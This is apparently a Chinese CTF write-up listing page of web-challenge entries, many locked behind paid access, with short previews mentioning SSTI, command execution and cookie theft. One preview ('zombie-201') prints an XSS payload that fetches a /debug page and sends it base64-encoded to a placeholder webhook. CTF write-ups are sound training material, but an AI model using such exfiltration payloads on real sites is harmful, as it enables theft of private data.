-
Personal_IP_Query-
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 8天前
-
TAMUctf2019 Science——ssti模板注入
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 15天前
-
zombie-201
进入题目是这个界面从第一个框传入payload,然后从第二个框中访问,具体如下:1.首先构造payloadfetch('{你的题目地址}/debug').then((response)=>response.text()).then(data=>fetch('{你的webhook地址}?data='+btoa(data)))由于http_only设置为了true,因此不能通过docume...
- WEB
- 19天前
-
SQL注入.2
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 21天前
-
签到题[NCTF - 2018] [WEB]
直接浏览器请求/index.php会自动执行/search/src=https%3A%2F%2Fpic.rmb.bdstatic.com%2Fbjh%2Fuser%2F0b75af50fffda1eaef389f0ef49d1e37.jpeg&refer=http%3A%2F%2Fwww.baidu.com&app=2021&size=r1,1&n=0&g=...
- WEB
- 26天前
-
签到题[miniLCTF-2020] [WEB]
看到首页中system知道a为传入的命令尝试ls/可以得到/下目录尝试执行/readflag显示一个字符串尝试使用cat等读取readflag看是不是正常文件显示乱码,搜索flag没信息,打开源代码查看并搜索flag显示如上一个表达式%d+%d=%d,可能这个readflag是一个交互式二进制文件我们尝试构造语句模拟输入echo-e生成交互式输入表示两个数字结果为100管道|将这些输入传递给/re...
- WEB
- 26天前
-
inspector Challenge Details A baby web challenge
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
HECTF-baby_sql
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 1月前
-
source
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 1月前
-
attack-strategies
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 2月前
-
GoldenHornKing
打开网页给出了源代码首先肯定是格式化一下这里是个超时函数(不重要)第一行创建FastAPI应用实例第二行控制对Jinja2模板渲染的访问后面将当前路径的目录作为Jinja2模板的目录第一个"/"路由没什么好说的首先是检查calc_req是否包含数字、百分号、非ASCII字符或者access是否已经被设置为True如果安全检查通过这行代码将使用Jinja2模板引擎渲染calc_req参数jinja2...
- WEB
- 2月前
-
NCTF-2018 签到题
打开网站是百度看到下面的cookie有信息,抓包在请求包中添加cookie,并修改url
- WEB
- 2月前
-
image compressor
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 2月前
-
view source的Writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 2月前
-
admin_Test
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- WEB
- 3月前
-
Upload_it_2 解题
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 3月前
-
web_test
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 4月前
-
SS Xperience
constants.pyFLAG=os.getenv('FLAG',r'grey{fake_flag}')COOKIE={"flag":FLAG}flag在cookie里边,想到cookie外带。adminbot中fromconstantsimportCOOKIE driver.get(f'{baseUrl}/')cookie={"name":"flag","value":C...
- WEB
- 4月前
-
需要管理员
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
4 金币
- WEB
- 4月前
-
miniLCTF签到题
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- WEB
- 5月前
